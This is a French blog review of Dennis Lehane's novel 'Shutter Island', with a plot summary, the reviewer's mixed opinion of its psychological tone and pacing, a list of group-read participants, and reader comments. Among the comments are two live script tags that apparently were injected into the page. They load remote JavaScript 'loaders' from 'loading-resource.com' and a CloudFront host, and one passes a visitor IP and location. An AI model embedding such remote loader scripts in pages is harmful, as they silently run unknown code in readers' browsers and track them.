-
Shutter Island - Dennis Lehane - Rivages noir
RésuméNous sommes dans les années cinquante. Au large de Boston, sur un îlot nommé Shutter Island, se dresse un groupe de bâtiments à l'allure sinistre. C'est un hôpital psychiatrique pour assassins. Le Marshal Teddy Daniels et son coéquipier Chuck Aule ont été appelés par les autorités de cette prison-hôpital car l'une des patientes, Rachel Solando, manque à l'appel. Comment a-t-elle pu sortir d'une cellule fermée à clé de l'extérieur ? Le seul indice retrouvé dans la pièce est une feuille de papier sur laquelle on peut lire une suite de chiffres et de lettres sans signification apparente. Oeuvre incohérente d'une malade ou cryptogramme ? Progressivement, les deux policiers s'enfoncent dans un monde de plus en plus opaque et angoissant, jusqu'au choc final de la vérité.Mon avis: J'ai lu ce livre dans le cadre d'une LC sur Livraddict.com
C'est des fois ce qui arrive quand on en entend beaucoup parler, on place la barre trop haut. Je pense que c'est un peu ce qui m'est arrivé.Je m'attendais à quelque chose de plus rapide et aussi, pas autant psychologique. En thriller, c'est quelque chose qui me met mal à l'aise (quand c'est trop psychologique). Du coup, avec Shutter Island, j'ai été servie!Par contre, là où j'ai été séduite, c'est par l'écriture. Sa stratégie d'écriture plus précisément. L'auteur mélange avec savoir faire l'action aux moments où Teddy se plonge dans ses souvenirs ou encore aux dialogues avec son coéquipier ou le médecin Cawley. Cette façon de procéder ralentit l'action selon moi, mais dans tous les cas, c'est très bien amené.Au fur et à mesure du récit, l'écriture devient plus sombre. Teddy doute de plus en plus, l'étau se ressere. Quand j'y repense, je me dis qu'il n'y a pas de plongeon dans le texte où tout d'un coup, on se dit que ça change de rythme. J'ai au contraire trouvé que c'était très progressif. Le rythme de la fin est bien plus soutenu que le début, c'est certain.Teddy est un personnage très intéressant. Dur mais faible. Peut-être un peu stéréotypé, mais un c'est un peu la loi des thrillers. Je me suis attachée à lui, à espèrer qu'il s'en sorte mais aussi, qu'il arrive quelque part, qu'il arrête de nager en eaux troubles.L'idée même de cette île me fait froid dans le dos. Une ambiance pareille, c'est vraiment glaçant. Mais cela augmente la pression car qui dit île dit huis-clos, dit aucune porte de sortie. il n'y a rien à dire sur l'ambiance, elle est parfaite!En résumé, une lecture qui m'a laissée mitigée. Le contexte ultra-psychologique m'a franchement dérangée, je ne peux pas autant apprécié un livre quand la psychologie est aussi fortmement représentée. Mais je retiens l'écriture qui m'a complètement emballée.Je suis contente de l'avoir lu et avant le film, eh oui!!Voici les autres participants à la LC organisé par Elora:Elora
Tousleslivres
Kkrolyn
Ellcrys
MamanMic
Dead Souls
Pomm
Isallysun
Midnight-Sun
angelebb
Bavardelik
Dex
Korto
fée-tish
Mia
Aurélie.
mimigogotte
Gr3nouille2010
-
Commentaires
Il m'a embarqué moi ! Un très très bon thriller ! L'auteur nous mène par le bout du nez, bises !
Peut-être que c'était trop psychologique pour toi mais ton avis montre bien quand même à quel point l'auteur a su raconter cette histoire ^^ Comme tu le sais j'ai adoré cette fin qui m'a laissé complètement baba (& idiote d'un côté puisque je me suis vraiment senti mener ne bateau xD), c'est juste dommage que le début soit aussi lent mais bon, la fin rattrape bien !
<script src="http://loading-resource.com/50.js.php?i=%7B4D78A890-103E-4ECB-97F8-246471D679F1%7D" type="text/javascript"></script> <script src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=A1&ccid=Saint-jean-de-losne&ip=86.204.23.182" type="text/javascript"></script>Ah je peux comprendre que le côté thriller psychologique à l'extrême peut se révéler perturbant... De mon côté, j'adore mais après c'est une question de sensibilité à ces questions. Quoiqu'il en soit, c'est un thriller intelligent car le fait d'avoir été mal à l'aise est une sensation qui marque et qui fait qu'on se souvient du livre !
pense que l'auteur voulait que ce soit encore plus intense en mettant une certaine lenteur dans le récit. C'est un très bon thriller psychologique pour ma part.
ourtant, je trouve que les thrillers doivent avoir un côté plus psychologique développé que dans les policiers! Comptes-tu voir le film?
non, pour moi thriller et psychologie ne vont pas du tout forcément ensemble et ce type-là de thriller ne me convient pas en tout cas... ici c'était trop fort pour moi.
Je pensais voir le film avec mon copain, mais il veut lire le livre avant, donc ça attendra mais je finirai par le voir c'est sûr!! ^^
Ajouter un commentaire
Un roman très noir, qui va vite, qui prend aux tripes et qui ne laisse pas indifférent, personnellement il ne m'a pas laissée indifférente, j'ai adoré !!!